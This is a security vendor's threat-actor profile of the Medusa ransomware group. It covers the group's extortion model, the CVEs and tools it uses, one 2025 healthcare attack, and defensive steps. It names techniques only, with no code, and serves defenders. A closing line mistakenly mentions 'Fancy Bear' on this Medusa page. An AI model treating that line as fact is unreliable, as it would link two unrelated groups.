Huntress Acquires Inside Agent: A New Era for Identity Protection
Portal LoginSupportContact
Search
Portal LoginSupportContact
Search
Get a Demo
Free Trial
HomeThreat Actors
Medusa
Threat Actor Profile

Medusa

The Medusa ransomware group has been making waves since late 2021, operating a Ransomware-as-a-Service (RaaS) model. These actors use double-extortion, meaning they don't just encrypt your data—they steal it first and threaten to leak it on their dark web site. It's a nasty one-two punch designed to maximize pressure.

Threat Actor Profile

Medusa

Country of Origin

The exact country of origin for Medusa is unknown. Like many ransomware groups, they operate with a high degree of anonymity, making attribution a tough nut to crack.

Members

Information about Medusa's group size or member aliases is not publicly available. They are known to recruit initial access brokers (IABs) from cybercriminal forums to gain entry into victim networks, offering payments ranging from $100 to over $1 million.

Leadership

The leadership structure and specific aliases of Medusa's core developers are currently unknown. Ransom negotiations appear to be centrally controlled by the main group, even within their affiliate-based RaaS model.

Medusa TTPs

Tactics

Medusa's primary goals are financial gain through extortion and disruption. They accomplish this through a double-extortion model:

  1. Data Exfiltration: They steal sensitive data from victims' networks before encryption.

  2. Data Encryption: They encrypt critical files, rendering systems and services unusable.

Extortion: They demand a ransom payment for the decryption key and to prevent the public release of the stolen data on their data leak site (DLS). They even offer to extend the data leak countdown for a daily fee of $10,000. Yikes.

Techniques

So, how do they pull this off? Medusa actors are big fans of using what's already there, a technique known as "living-off-the-land" (LotL). This helps them blend in and avoid detection.

  • Initial Access: They often get their foot in the door by exploiting unpatched vulnerabilities in public-facing applications like Microsoft Exchange, ScreenConnect (CVE-2024-1709), and Fortinet (CVE-2023-48788). Phishing campaigns are also a go-to method for snatching credentials.

  • Discovery & Lateral Movement: Once inside, they use legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner to map out the network. They move across the network using Remote Desktop Protocol (RDP) and legitimate remote access tools like AnyDesk, ConnectWise, and SimpleHelp.

Defense Evasion: Medusa actors use a "Bring Your Own Vulnerable Driver" (BYOVD) technique to disable security software. They deploy a signed, vulnerable driver to kill EDR and antivirus processes. They also use PowerShell with obfuscated and base64-encoded commands to fly under the radar.

Procedures

Medusa's playbook is pretty consistent, which might mean they either have a small, tight-knit group of affiliates or provide a very specific set of instructions.

  • Credential Dumping: They use tools like Mimikatz to pull credentials from memory (LSASS dumping), giving them the keys to move around the network freely.

  • Data Exfiltration: The tool of choice for smuggling data out is often Rclone, a command-line program for managing files on cloud storage.

Payload Deployment: They use legitimate software deployment tools like PsExec and PDQ Deploy to push their ransomware payload, gaze.exe, across the network. Before encrypting, this payload terminates security services, backup processes, and deletes volume shadow copies to prevent easy recovery.

Want to Shut Down Threats Before They Start?

Schedule a Demo Todayright arrow

Notable Cyberattacks

Medusa has been relentlessly active, with a significant spike in attacks observed throughout 2024 and 2025. While many victims go unnamed, the group has publicly listed hundreds of organizations on its leak site.

One documented attack in January 2025 targeted a U.S. healthcare organization, compromising several hundred machines. The attackers used a combination of SimpleHelp, Mesh Agent, and AnyDesk for remote access and deployed PDQ Deploy to distribute the ransomware. This incident highlighted their consistent use of legitimate tools to orchestrate a widespread attack, from initial staging to final encryption.


Law Enforcement & Arrests

As of now, there have been no major, publicly announced law enforcement actions, arrests, or infrastructure takedowns specifically targeting the Medusa ransomware group. However, agencies like the FBI and CISA are actively tracking their activities and have issued joint cybersecurity advisories to help organizations defend against their TTPs.

How to Defend Against Medusa

1

Patch, Patch, Patch: Medusa loves exploiting known vulnerabilities. Keep your operating systems, software (especially public-facing ones!), and firmware updated. Prioritize patches for known exploited vulnerabilities.

2

Enforce MFA: Require multifactor authentication for everything possible, especially for remote access, webmail, and critical system accounts.

3

Segment Your Network: Control traffic flow between subnetworks to limit an attacker's ability to move laterally. If they get into one part of your network, don't let them have the keys to the whole kingdom.

4

Restrict & Monitor Tools: Disable unnecessary ports and scripting tools like PowerShell where they aren't needed. Monitor for abnormal use of legitimate software like PsExec, RDP, and other remote admin tools.

5

Backup Your Data: Maintain offline, encrypted, and immutable backups. Test your restoration process regularly to ensure you can recover quickly if the worst happens.

Huntress solutions help protect organizations by monitoring endpoints, detecting intrusions, and mitigating Fancy Bear threats withenterprise-grade technology.

Schedule a Demo

References

Detect, Respond, Protect

See how the global Huntress SOC can augment your team
with 24/7 coverage and unmatched human expertise.
Start your free trial today.

Try Huntress for Free